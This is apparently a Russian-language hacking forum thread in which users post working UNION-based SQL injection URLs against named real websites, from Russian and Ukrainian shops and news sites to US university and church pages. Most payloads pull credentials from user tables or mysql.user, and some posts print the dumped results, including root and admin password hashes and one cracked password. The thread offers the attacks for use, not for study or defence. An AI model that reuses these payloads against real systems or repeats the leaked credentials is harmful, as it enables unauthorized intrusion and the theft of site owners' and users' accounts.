SQL Инъекции

Вывод в title'е:

Code:

http://www.rosmed.ru/news.php?act=by_id&news_id=-1+union+select+convert(concat(comp_domain,char(58),comp_user_fio,char(58),comp_user_mail,char(58),comp_user_pass,char(58),comp_addr_phone),char),2+from+comp/*

 

Code:

http://english.dvb.no/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10/*

 

www.tal-shop.se

Code:

http://www.tal-shop.se/index.php?id=5&cid=-38+union+select+concat(passwd,0x3a,id_user,0x3a)+from+users/*

Code:

http://www.spinter.net/page.php?id=-22+union+select+version(),user()/*

Code:

http://www.gmstz.edu.ba/vijesti.php?id=-64+union+select+1,database(),3,4,5/*

 

Даже char() не потребовался, как знали =))

Code:

http://www.gostudy.com.ua/news.phtml?id=-40+union+select+1,2,user(),database(),version(),6,7,8,9+from+users/*

Это ответ недавнему "великому" взлому удава... 3 действия)

Code:

http://www.www.account.spb.ru/?Cat=regadms&Mod=view&ID=-2+union+select+1,2,3,4,5,6,TABLE_NAME,8,9,10,11,12,13,14+from+INFORMATION_SCHEMA.TABLES/*
http://www.www.account.spb.ru/?Cat=regadms&Mod=view&ID=-2+union+select+1,2,3,4,5,6,COLUMN_NAME,8,9,10,11,12,13,14+from+INFORMATION_SCHEMA.COLUMNS/*
http://www.www.account.spb.ru/?Cat=regadms&Mod=view&ID=-2+union+select+1,2,3,4,5,id,concat_ws(char(58),FIO,Login,PasWD),8,9,10,11,12,13,14+from+accounts/*

 

centresh.ru

 

колонку с паролем не смог найти -

Code:

http://www.expat.ru/restaurantreviews.php?cid=-1+union+select+1,2,3,4,5,username,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+user+limit+2000,2001

Code:

http://www.sportshopik.ru/shop.php?CID=-1+union+select+1,concat(user(),char(64),version(),char(64),database())

 

Code:

http://www.polirem.ua/polyukr/news.phtml?id=-16+union+select+concat_ws(char(58),user(),database(),version())/*

симпотишная =\

Code:

http://www.skitours.com.ua/news.phtml?id=-13763+union+select+1,concat(version(),char(58),user()),password,id,database(),6,7,8,9,10,11+from+users/*

Code:

http://www.kharkov-sport.com/news.phtml?id=-1326+union+select+1,2,database(),version(),5,6,7,8,9,10,user()/*&print=yes

 

www.rootkitshield.com

Code:

http://www.rootkitshield.com/links/dead.php?id=-8+union+select+1,2,3,4,version(),6,7,8,9/*

 

www.mashinki.ru

Code:

http://www.mashinki.ru/news.shtml?id=-93+UNION+SELECT+1,2,3,4,5,6,7,8/*

 

to InferNo23

Code:

http://www.expat.ru/restaurantreviews.php?cid=-1+union+select+1,2,concat(password,0x3a,username),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+user/*

8fb8b4736f9f74bb1d301491e1798b08:Martin

 

Code:

http://www.massagan.com/news.php?mod=news&catid=1&id=-540+union+select+1,concat(user(),0x3a,version(),0x3a,database()),password,4,5,6,name,8+from+users/*

 

www.proformula.ua

Code:

http://www.proformula.ua/news.phtml?id=-9174+union+select+1,version(),3,4,5,6,7,8,9,10,11/*

www.gostudy.com.ua

Code:

http://www.gostudy.com.ua/news.phtml?id=-40+union+select+1,user(),3,4,5,6,7,8,9/*

 

Code:

  http://www.archdiocese.la/podcasts/detail.php?id=-30%20UNION%20SELECT%201,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users/*

 

http://www.dozka.ru/start.php?main=gallery&act=image&image=-1+union+select+1,2,3,password,5,6,7,8+from+forum+limit+0,10/*

http://www.orel-news.ru/index.php?main=showorelnews&id=-1+union+select+1,2,3,4,version(),6,7,8,9/*


http://www.psyedu.ru/rub.php?tema=-1+union+select+1,concat(id,0x7c2d2d7c,password,0x7c2d2d7c,email),3+from+users/*

http://bestposters.ru/main.php?big=-1+union+select+1,2,email,4,5,login,7,password,9,10,11,12,13,14,15+from+users+limit+3,1/* (Прямо на мыло и в асю )

http://www.farma-96.ru/index.php?main=catalogue&object=round&round_ID=-1+union+select+1,2,3,4,name,6,7,pass,9,10+from+users+limit+2,1/*

http://www.openmic.ru/song_info.php?songid=-1+union+select+1,2,3,4,user(),6,7,8/*


http://www.bis077.ru/main.php?action=catalog_body&item=catalog_firm&id=-1+union+select+1,2,3333333,4,5+from+users/*

 

Code:

http://www.liverpoolfc.ru/news.php?id=-861+union+select+1,u.*+from+users+u/*

 

Code:

http://www.mcmenamins.com/index.php?loc=3+and+1=999+union+select+1,2,3,4,5,6,concat(user,0x3a,password),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user+limit+0,1/*

root:07323b9e7d2a8d4f

Code:

http://www.unirc.it/comunicazione/all_news.php?task=view&id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x00),0x00),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+mysql.user+limit+3,1/*

admin:0e67f9402e61771f == rowing
root:46d9bd420a1edee2

 

http://www.adams-motors.ru/new.php?id=-1+union+select+11,2,222/*

 

www.da.wvu.edu

Code:

http://www.da.wvu.edu/XMLParser/printstory.phtml?id=-22813+union+select+1,2,user(),4,5,6,7,8,9,10,11/*

 

Code:

http://bl4u.ru/stat.php?id=-1+union+select+1,2,version(),4,5,6/*

___

Code:

http://present-link.info/stat.php?id=-1+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

Code:

http://www.top100.vrn.ru/stat.php?id=-1+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

p.s. Во всех скриптах этого каталога sql инъекция...

 

http://webwarper.net/ru/www.nskfei.ru/girl.php?ids=-52+union+select+1,2,3,4,5,6,7,8/*

http://www.spb-mebel.ru/show_firm.php?id_firm=-171+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://www.pobeda.info/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,concat(pn_uname,0x3a,pn_pass,0x3a,pn_email),6,7,8,9,10,11,12,13,14,15,16,17+from+nuke_users+limit+1,1/*

http://hike.ru/index.php?module=subjects&func=viewpage&pageid=1+union+select+1,2,3,4,concat(pn_uname,0x3a,pn_pass,0x3a,pn_email),6,7,8,9,10,11,12,13,14,15,16,17+from+nuke_users+limit+2,1/*

http://www.jordandistrict.org/policymanual/p.php?id=-26+union+select+1,2,3,4,5/*

http://it.byuh.edu/P%20&%20S/p.php?id=-21+union+select+1,2,3/*

http://www.swiss-music-export.com/p.php?ID=-148+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

http://date.bignepal.com/p.php?id=-1290+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*